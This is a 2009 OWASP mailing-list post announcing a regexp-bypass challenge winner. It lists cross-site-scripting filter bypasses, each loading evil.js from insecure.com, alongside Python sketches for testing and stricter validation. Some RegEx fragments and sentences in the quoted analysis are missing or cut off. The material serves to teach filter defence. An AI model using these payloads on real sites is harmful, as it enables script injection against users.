[Appsec_eu_2010] Winner of Challenge 1

John Wilander john.wilander at owasp.org
Tue Jul 21 13:49:49 EDT 2009

Dear Challenge 1 contenders and all others interested in AppSec Research
2010 (cc OC),

[Sorry if some of you get two copies. We wanted to be sure you all get this.]

There were a lot of submissions to June's challenge, and many of you had
really worked hard to turn our poor little regexp into something else
entirely. Many of you pointed out that <script>-tags cannot be
self-enclosed, but must have a closing tag. We stand corrected. We were
however lenient when judging submissions, so both variants were ok. It
turned out there were four generally preferred attacks. They were, in order
of popularity:

* Double (or, multiple) src-attributes: 17 submissions
Example: <script src='foo' src='bar' />
Which src-attribute gets loaded is up to the browser implementation, but
empirically it has proven to be the first one.

* Invalid attribute: 10 submissions
Example: <script asrc='foo' src='bar' />
This attack is a bit more refined than the one above. It uses the browser's
rule for compatibility: skip what you don't understand and do what you can
with what you've got. Attributes that are not understood are discarded, which
is what happens to the attribute the server side takes to be the src-attribute.

* Several script tags: 7 submissions
Example: <script src='foo'/><script src='bar'/>
This attack was directed only at the regexp, which lets this pass. However,
surrounding control flow may stop this, which is hinted at in the
description "whenever a piece of code containing "<script..." is encountered
[...]", where we intentionally left that part vague.

* Html comment block: 4 submissions
Example: <script <!-- src='foo' --> src='foo' />
This attack, though ostensibly fine, did not work in Firefox. It seems FF
does not allow comment blocks inside tags, and therefore discards the entire
tag.

* Other: 5 submissions
There were several attacks here. One that surprised me was that
JavaScript-style comments worked well in an HTML context; the attack vector
<script /*src='foo'*/  src='bar'/> worked fine (as opposed to <!-- -->). A
few of you relied on variations of CaSe, since the regexp was not specified
as case insensitive. The most overkill solution, which one person came up
with: the period signs were not escaped, which meant that someone could
acquire the domain name scriptsoyahoogle.com to get it through the regexp!
Alas, probably not through the whitelist :(.
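
A minimal sketch of how these attacks slip past a naive filter. The challenge
regexp itself is not reproduced in this mail, so NAIVE below is only a
hypothetical stand-in (unescaped periods, no case-insensitive flag), and
filter_allows() is an assumed version of the "surrounding control flow". The
URLs are the ones used in the analysis further down.

```python
import re

# Hypothetical stand-in for the challenge filter (NOT the original regexp).
# The periods are deliberately unescaped and no case-insensitive flag is set.
NAIVE = re.compile(r"<script.*src='http://secure.yahoogle.com/scripts/.*'")

GOOD = "http://secure.yahoogle.com/scripts/42.js"
EVIL = "http://insecure.com/evil.js"


def filter_allows(html: str) -> bool:
    """Assumed control flow: only text containing '<script' is checked."""
    if "<script" not in html:
        return True
    return NAIVE.search(html) is not None


ATTACKS = {
    "double src": f"<script src='{EVIL}' src='{GOOD}' />",
    "invalid attribute": f"<script asrc='{GOOD}' src='{EVIL}' />",
    "several script tags": f"<script src='{GOOD}'/><script src='{EVIL}'/>",
    "javascript comment": f"<script /*src='{GOOD}'*/ src='{EVIL}'/>",
    "case variation": f"<SCRIPT src='{EVIL}'></SCRIPT>",
    "unescaped period": "<script src='http://secureXyahoogle.com/scripts/42.js' />",
}

if __name__ == "__main__":
    for name, payload in ATTACKS.items():
        print(f"{name:20} allowed={filter_allows(payload)}")
```

Every payload in ATTACKS gets through this stand-in, while a plain
<script src='http://insecure.com/evil.js'></script> is rejected. Whether a
browser then actually loads the evil script is a separate, browser-dependent
question, as noted for each attack above.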

We will not publish any resulting 'safe' variant of the regexp. As many of
you pointed out, the described overall solution is very precarious and
creating the perfect regexp is extremely difficult.

*The winner of Challenge 1 is Patrik Nordlén*, who posted a
'double-src-attributes'-solution early Monday morning. His modified regexp
(remember: we only asked you to fix *your* attack, not all possible flaws)
required whitespace between <script and src. Patrik, you'll receive a
separate email with your prize ticket.

Once again, thanks for the contributions! *See you in the next challenge,
posted on the wiki very soon* ;).

   Regards, Martin, John, and the rest of the OC

*Honorable mention goes to Achim Hoffmann*, author of EnDe. EnDe is "an
Encoder, Decoder, Converter, Calculator, TU WAS DU WILLST .. [1] for various
codings used in the wild wide web)"  (http://ende.my-stp.net/ ). Achim
posted the following analysis of the challenge and the problems you face
with this kind of solution:

*** Start of Achim Hoffmann's analysis ***

Here is a more detailed description of some attacks and countermeasures.

try { First attack patterns against the posted RegEx:

 1) <SCRIPT src="http://insecure.com/evil.js" />
    <SCRIPT SRC="http://insecure.com/evil.js" />
    <sCript src="http://insecure.com/evil.js" />

 2) (same as above but with a pattern for the whitelist)
    <SCRIPT src="http://insecure.com/evil.js" src='http://secure.yahoogle.com/scripts/42.js' />
     (some more with SRC or Script or sCript or ...)

 3) <sCript src="http://insecure.com/evil.js" src='HTTP://secure.yahoogle.com/scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src='http://secure.yaHOOgle.com/scripts/42.js' />

 4) <sCr\tipt src="http://insecure.com/evil.js" src='http://secure.yahoogle.com/scripts/42.js' />

 5) <sCript src="http://insecure.com/evil.js" src = 'http://secure.yahoogle.com/scripts/42.js' />

 6) <sCript src="http://insecure.com/evil.js" src = 'http://secure.yahoogle.com&#x2f;scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src = 'http://secure.yahoogle.com&#47;scripts/42.js' />

 7) <sCript src="http://insecure.com/evil.js" src = 'http://secure.yahoogle.com&%2f;scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src = 'http://secure.yahoogle.com&%02f;scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src = 'http://secure.yahoogle.com&%002f;scripts/42.js' />
    <sCript src="http://insecure.com/evil.js" src = 'http://secure.yahoogle.com&%0002f;scripts/42.js' />
    (and some more ...)

 8) <sCript src="http://insecure.com/evil.js" title="src = 'http://secure.yahoogle.com&/scripts/42.js'" />

 9) <sCript src="http://insecure.com/evil.js" /><script src='http://secure.yahoogle.com/scripts/42.js' />

10) Looking at 9), we also can use a script tag which does not use a src=
    attribute but native javascript code. In that case I'd load the external
    .js file using XMLHttpRequest() and using eval().

11) What about using https instead of http?

12) <sCript src="http://insecure.com/evil.js" type="text/javascript" src='http://secure.yahoogle.com/scripts/42.js' src="http://insecure.com/evil.js"

 *) keep in mind that each of the above is just one example out of countless
    others, and that they can all be mixed as you like
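
To see why patterns 1), 2), 8) and 12) are awkward for a regexp, it can help
to look at how a tolerant HTML parser reads them. The sketch below uses
Python's standard html.parser, which is not a browser and may disagree with
real browsers on details. ALLOWED_PREFIX and the "exactly one src" policy in
acceptable() are assumptions made for this illustration, not part of the
challenge.

```python
from html.parser import HTMLParser

# Assumed whitelist prefix, taken from the example URLs above.
ALLOWED_PREFIX = "http://secure.yahoogle.com/scripts/"


class ScriptSrcCollector(HTMLParser):
    """Collect every src value seen on each script start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.script_srcs = []  # one list of src values per script tag

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names before calling us,
        # so <SCRIPT SRC=...> and <sCript src=...> both end up here.
        if tag == "script":
            self.script_srcs.append([v for k, v in attrs if k == "src" and v])


def script_srcs(html: str):
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    return parser.script_srcs


def acceptable(html: str) -> bool:
    """Assumed policy: each script tag has exactly one, whitelisted src."""
    return all(
        len(srcs) == 1 and srcs[0].startswith(ALLOWED_PREFIX)
        for srcs in script_srcs(html)
    )
```

For pattern 2) the parser reports both src values on a single script tag, so
the policy rejects it; for pattern 8) the whitelisted URL only shows up inside
title and never counts as a src.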


catch { Second explanation and possible RegEx:

 1) I'm unsure if this matches the requirements of the challenge because
    it depends on the programmatic interpretation of the matches.
    For a solution see 2) below

 2) This one simply attacks the missing case-insensitive matching. The RegEx
    could be improved like:


 3) You have to think about values also, not only tags:


    As this is still not sufficient, you also have to match the FQDN
    case-insensitively (I'll skip the example for that because it can be a
    simple i modifier in the RegEx engine used)

 4) Here \t means a real TAB (hex 0x09) character. It depends on the target
    browser whether such a payload is rendered (IE will:). Instead of \t you
    may also use \r or \n or \f or any combination of these.
    This situation cannot easily be matched with a RegEx as you cannot use
    the \s meta character (which includes spaces, which would break the tag).
    Hence you need (?:[\t\n\r\f]*) right behind each character of the tag
    and behind each character of the attribute names.
    Here is just an excerpt of such a RegEx (not complete according the
    I'm not sure (meaning I never tested it) if \t and the like are also valid
    behind the opening <.
    BUT that's still not enough, as we have a ton of other Unicode characters
    which will be silently used by some browsers (just think of halfwidth and
    fullwidth forms, or %c2%0d where IE and/or IIS silently ignore the high
    bits).

 5) Another one which depends on the target browser: spaces around the = of
    tag attributes.
    In this case we can use the \s meta character:


  6) Using HTML entities in the URL. You'd better not use a RegEx for that
     (unless you are prepared for a multi-kilobyte RegEx ;-)

  7) Using URL-encoding in the URL. This can be done with a RegEx in some
     engines only (for example Perl's RegEx), hence I omit a solution for that.

  8) How about embedding the required whitelist into another tag? I'm unsure
     if this can be matched with a RegEx, at least not with simple engines.

  9) Close the script tag and open it again. This needs a programmatic check
     of the captured groups.

 10) A RegEx cannot handle that.

 11) Allowing https is simple:


 12) In my suggestion yesterday I said that the attack may depend on the
     browser (because of the src= attribute used). If we assume that a
     browser either reads just the first src= attribute, or reads all
     attributes and the last wins, we have a more universal pattern here.
     Also, as explained yesterday, this is hard (if not impossible) to detect
     with a RegEx.
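
The RegEx fragments for 2), 4), 5) and 11) are not reproduced in this copy of
the mail. The sketch below is not a reconstruction of them; it only shows,
under that caveat, how the building blocks described in words could be
combined in Python's re module. The names GAP, spaced and SCRIPT_TAG are made
up for this illustration.

```python
import re

# The class given in 4): TAB, LF, CR, FF, but deliberately no space.
GAP = r"(?:[\t\n\r\f]*)"


def spaced(word: str) -> str:
    """Allow GAP after every character of word, as 4) describes."""
    return "".join(re.escape(ch) + GAP for ch in word)


SCRIPT_TAG = re.compile(
    "<" + spaced("script")      # 4) control characters inside the tag name
    + r"\s+" + spaced("src")    # 4) ... and inside the attribute name
    + r"\s*=\s*"                # 5) optional whitespace around '='
    + r"'(https?://[^']*)'",    # 11) http or https; URL captured for later checks
    re.IGNORECASE,              # 2) and 3) case-insensitive matching
)

if __name__ == "__main__":
    payload = "<sCr\tipt src = 'HTTPS://secure.yahoogle.com/scripts/42.js' />"
    match = SCRIPT_TAG.search(payload)
    print(match.group(1) if match else "no match")
```

This only recognises such a tag and captures the URL; deciding whether the
captured value is acceptable, and coping with 6) to 10) and 12), still needs
code around the RegEx.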

finally {
 All in all, I'd assume that there is no RegEx-only solution for the
 You always need a RegEx, probably more than one, and a corresponding code
 which checks the captured groups. That would result in a huge RegEx (more
 ugly depending on the RegEx engine) and a cumbersome code to check the

 For a simple clean "Input Validation" I'd use following (with a

 Then discard all data not matching that RegEx completely. This means that
 you need to tell the user that only script tags like
<script +src='http://secure.yahoogle.com/scripts/whatever.js' .... >
 are accepted. In words:
opening <script tag
followed by at least one space
followed by src= attribute (no spaces allowed here)
followed by URL enclosed in single quotes

 KISS - keep it simple stupid.
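
A minimal sketch of such a strict check, following the description in words
above. The RegEx suggested in the mail is not reproduced here, so STRICT is an
assumption: the allowed file-name characters are a guess, and since the
description leaves open what may follow the quoted URL ("...."), this sketch
permits only optional spaces before the closing >.

```python
import re

# Assumed strict pattern: everything is spelled out, periods are escaped,
# matching is case sensitive and must cover the whole input.
STRICT = re.compile(
    r"<script"                                   # opening <script tag
    r" +"                                        # at least one space
    r"src="                                      # src= attribute, no spaces
    r"'http://secure\.yahoogle\.com/scripts/"    # URL in single quotes
    r"[A-Za-z0-9_-]+\.js'"                       # assumed file-name characters
    r" *>"                                       # assumption: only spaces, then >
)


def validate(data: str) -> bool:
    """Return True only if the whole input is one acceptable script tag."""
    return STRICT.fullmatch(data) is not None


if __name__ == "__main__":
    print(validate("<script src='http://secure.yahoogle.com/scripts/42.js'>"))
    print(validate("<SCRIPT src='http://secure.yahoogle.com/scripts/42.js'>"))
```

Anything that does not match is discarded rather than repaired, which is what
keeps the check simple.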


  I'd slightly disagree with the Jamie Zawinski quote. It should be expanded to:
    Some people, when confronted with a problem, think "I know, I'll use
    regular expressions." Now they have *more* problems.

I'm pretty sure that these are not all attack patterns for this challenge.

*** End of Achim Hoffmann's analysis ***